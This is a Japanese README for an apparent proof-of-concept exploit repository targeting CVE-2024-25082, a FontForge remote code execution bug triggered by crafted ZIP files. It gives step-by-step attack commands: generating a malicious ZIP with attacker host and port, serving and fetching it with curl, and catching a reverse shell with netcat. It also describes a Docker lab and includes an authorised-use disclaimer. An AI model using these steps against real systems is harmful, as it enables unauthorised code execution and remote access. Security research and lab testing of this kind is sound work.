
CVE-2024-25082の概念実証エクスプロイトで、細工されたZIPアーカイブを介したFontForgeのリモートコード実行を示します。ペイロードジェネレータ、Dockerラボ、技術解説を含み、セキュリティ研究と教育に使用します。
CVE-2024-25082 の Proof-of-Concept エクスプロイト。FontForge に影響を与える脆弱性で、細工された ZIP アーカイブを介してリモートコード実行 (RCE) を可能にします。
このリポジトリは、セキュリティ研究および教育目的のために、管理されたラボ環境でこの脆弱性をどのように悪用できるかを示しています。
この脆弱性は、ZIP アーカイブ内のファイルの検証が不適切であるために発生し、攻撃者が標的のシステム上で任意のコマンドを実行できるようになります。
CVE-2024-25082-FontForge-ZIP-RCE/
├── README.md
├── exploit.py
├── poc/
│ └── exploit.zip
├── writeup.md
└── License
File 説明
exploit.py 悪意のある ZIP ペイロードを生成します poc/ 生成された Proof-of-Concept ファイルを含みます writeup.md 脆弱性の技術的解説
オプションツールをインストール:
sudo apt install netcat
python3 exploit.py --lhost <Your IP> --lport <Your Port>
これにより、悪意のある exploit.zip ファイルが生成されます。
python3 -m http.server 8080
curl http://<Your IP>:8080/exploit.zip -o /path/to/upload/directory/exploit.zip
nc -lvnp <Your Port>
成功すると、標的システムからシェルを取得できます。
再現可能な脆弱環境が docker/ ディレクトリ内に用意されています。
例:
cd docker/vulnerable_env
docker build -t fontforge-vuln .
docker run -p 8080:80 fontforge-vuln
これにより、本番システムに影響を与えずに安全にテストできます。
脆弱なアプリケーションで処理される ZIP ファイルをアップロードまたは制御できる攻撃者は、以下を行う可能性があります:
推奨される緩和策:
このリポジトリには、公開されている脆弱性に対する Proof-of-Concept コードが含まれています。
このコードは、以下の目的にのみ提供されています:
明示的な許可なしに、このコードをシステムに対して使用しないでください。
著者は、このソフトウェアによって引き起こされた誤用または損害について一切責任を負いません。
Moamen Elmaghrabi
サイバーセキュリティ学生
ペネトレーションテスト & エクスプロイト開発
このプロジェクトは MIT ライセンスの下でライセンスされています。
詳細については、LICENSE ファイルを参照してください。